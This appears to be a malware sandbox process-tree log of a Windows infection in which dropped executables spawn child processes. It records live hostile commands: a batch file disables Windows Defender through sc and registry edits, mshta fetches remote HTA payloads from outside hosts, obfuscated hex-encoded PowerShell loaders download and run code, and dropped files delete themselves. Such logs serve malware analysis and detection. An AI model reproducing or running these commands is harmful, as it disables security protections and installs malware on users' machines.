-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19048
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20384
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19924
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19068
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20072
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20052
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19560
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:14388
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19572
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:2956
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19776
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:13620
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20792
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:21244
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:14120
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19664
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:2200
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19336
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20172
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:17612
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:17088
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:12952
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:11104
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:21388
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19976
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:424
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19080
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:5092
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20980
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:1276
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20760
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19732
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:18516
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:15300
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:21408
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:18144
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:17888
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:21172
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:4848
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:5736
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19748
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19588
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:7232
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:18664
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:6716
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:18588
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:9808
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:11444
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:9504
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:21184
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:9920
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19816
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:4724
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:9488
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:13340
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:6856
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:8028
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:12200
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:21400
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:7828
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:12692
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:3676
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:1244
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:15548
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:6444
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:19736
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:10288
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:12124
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:7564
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:20060
-
-
C:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exeC:\Users\Admin\Documents\W7oljYTvb0greJisxX3M5pId.exe3⤵PID:14252
-
-
-
C:\Users\Admin\Documents\1A1ESKlVX41_1THLjvCaHbzq.exe"C:\Users\Admin\Documents\1A1ESKlVX41_1THLjvCaHbzq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\Users\Admin\AppData\Roaming\5178909.exe"C:\Users\Admin\AppData\Roaming\5178909.exe"3⤵PID:6164
-
-
C:\Users\Admin\AppData\Roaming\6794286.exe"C:\Users\Admin\AppData\Roaming\6794286.exe"3⤵PID:6212
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:8512
-
-
-
C:\Users\Admin\AppData\Roaming\5931076.exe"C:\Users\Admin\AppData\Roaming\5931076.exe"3⤵PID:6368
-
-
C:\Users\Admin\AppData\Roaming\7632333.exe"C:\Users\Admin\AppData\Roaming\7632333.exe"3⤵PID:6476
-
-
C:\Users\Admin\AppData\Roaming\5904660.exe"C:\Users\Admin\AppData\Roaming\5904660.exe"3⤵PID:6420
-
-
-
C:\Users\Admin\Documents\iriIOV1JbrvxZUJwLmGWZdTY.exe"C:\Users\Admin\Documents\iriIOV1JbrvxZUJwLmGWZdTY.exe"2⤵
- Executes dropped EXE
PID:2652 -
C:\Users\Admin\Documents\iriIOV1JbrvxZUJwLmGWZdTY.exe"C:\Users\Admin\Documents\iriIOV1JbrvxZUJwLmGWZdTY.exe" -u3⤵PID:6000
-
-
-
C:\Users\Admin\Documents\_gbSI4Sq2zHEv_J6xvQFcEqZ.exe"C:\Users\Admin\Documents\_gbSI4Sq2zHEv_J6xvQFcEqZ.exe"2⤵
- Executes dropped EXE
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\TzTM9hYc.com"C:\Users\Admin\AppData\Local\Temp\TzTM9hYc.com"3⤵PID:5304
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5B85.tmp\5B86.tmp\5B87.bat C:\Users\Admin\AppData\Local\Temp\TzTM9hYc.com"4⤵PID:5404
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵PID:5980
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled5⤵PID:6052
-
-
C:\Windows\system32\sc.exesc config Sense start=disabled5⤵PID:1784
-
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled5⤵PID:1192
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled5⤵PID:6060
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:5920
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:6200
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:6512
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:6764
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵PID:7040
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f5⤵PID:4744
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f5⤵PID:4984
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:7144
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:7020
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:4716
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:680
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:7112
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:7540
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f5⤵PID:7816
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f5⤵PID:8180
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:7464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"5⤵PID:7612
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"6⤵PID:7996
-
-
C:\Windows\system32\find.exefind /i "SecHealthUI"6⤵PID:7816
-
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f5⤵PID:2300
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f5⤵PID:7796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵PID:2244
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility6⤵PID:7764
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f5⤵PID:8168
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:8444
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:9128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9x4RIRVY.com"C:\Users\Admin\AppData\Local\Temp\9x4RIRVY.com"3⤵PID:6452
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://ia601408.us.archive.org/23/items/fix.hta-ert/FIX.hta_ert.txt4⤵PID:8860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601409XXXusXXXarchiveXXXorg/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435XXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))5⤵PID:11656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EvZw6XbS.com"C:\Users\Admin\AppData\Local\Temp\EvZw6XbS.com"3⤵PID:4920
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/1/FIX.hta4⤵PID:4392
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://kmsautoXXXus/1/fixXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))5⤵PID:11908
-
-
-
-
-
C:\Users\Admin\Documents\U8ajrH3cGZmccQG6aTCFeCtQ.exe"C:\Users\Admin\Documents\U8ajrH3cGZmccQG6aTCFeCtQ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Users\Admin\AppData\Roaming\8119459.exe"C:\Users\Admin\AppData\Roaming\8119459.exe"3⤵PID:6228
-
-
C:\Users\Admin\AppData\Roaming\4352761.exe"C:\Users\Admin\AppData\Roaming\4352761.exe"3⤵PID:6276
-
-
C:\Users\Admin\AppData\Roaming\1203390.exe"C:\Users\Admin\AppData\Roaming\1203390.exe"3⤵PID:6392
-
-
C:\Users\Admin\AppData\Roaming\8173985.exe"C:\Users\Admin\AppData\Roaming\8173985.exe"3⤵PID:6652
-
-
C:\Users\Admin\AppData\Roaming\7755275.exe"C:\Users\Admin\AppData\Roaming\7755275.exe"3⤵PID:3284
-
-
-
C:\Users\Admin\Documents\7GJ44oNz7WWzrR5c8PZf9648.exe"C:\Users\Admin\Documents\7GJ44oNz7WWzrR5c8PZf9648.exe"2⤵
- Executes dropped EXE
PID:3732 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 6603⤵
- Program crash
PID:5252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 6763⤵
- Program crash
PID:5688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 6843⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 11803⤵
- Program crash
PID:6680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 11243⤵
- Program crash
PID:6720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 10963⤵
- Program crash
PID:7120
-
-
-
C:\Users\Admin\Documents\fEG_jArGjfToLSIAV6Lzwwo0.exe"C:\Users\Admin\Documents\fEG_jArGjfToLSIAV6Lzwwo0.exe"2⤵
- Executes dropped EXE
PID:3288
-
-
C:\Users\Admin\Documents\jgwmA443nvNaVLUFMYx8WkZ0.exe"C:\Users\Admin\Documents\jgwmA443nvNaVLUFMYx8WkZ0.exe"2⤵
- Executes dropped EXE
PID:3008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 7683⤵
- Program crash
PID:5240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 8243⤵
- Program crash
PID:5700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 8443⤵
- Program crash
PID:6032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 8483⤵
- Program crash
PID:5528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 8563⤵
- Program crash
PID:5336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 10923⤵
- Program crash
PID:8096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 11323⤵
- Program crash
PID:8852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 13523⤵
- Program crash
PID:8680
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0710169202.exe"3⤵PID:9488
-
C:\Users\Admin\AppData\Local\Temp\0710169202.exe"C:\Users\Admin\AppData\Local\Temp\0710169202.exe"4⤵PID:10072
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 17763⤵
- Program crash
PID:9464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 17763⤵
- Program crash
PID:10492
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4586932993.exe"3⤵PID:11244
-
C:\Users\Admin\AppData\Local\Temp\4586932993.exe"C:\Users\Admin\AppData\Local\Temp\4586932993.exe"4⤵PID:10592
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "jgwmA443nvNaVLUFMYx8WkZ0.exe" /f & erase "C:\Users\Admin\Documents\jgwmA443nvNaVLUFMYx8WkZ0.exe" & exit3⤵PID:2224
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "jgwmA443nvNaVLUFMYx8WkZ0.exe" /f4⤵
- Kills process with taskkill
PID:10792
-
-
-
-
C:\Users\Admin\Documents\vJ22bESZ6vvECr7CUApjlvQK.exe"C:\Users\Admin\Documents\vJ22bESZ6vvECr7CUApjlvQK.exe"2⤵
- Executes dropped EXE
PID:3944
-
-
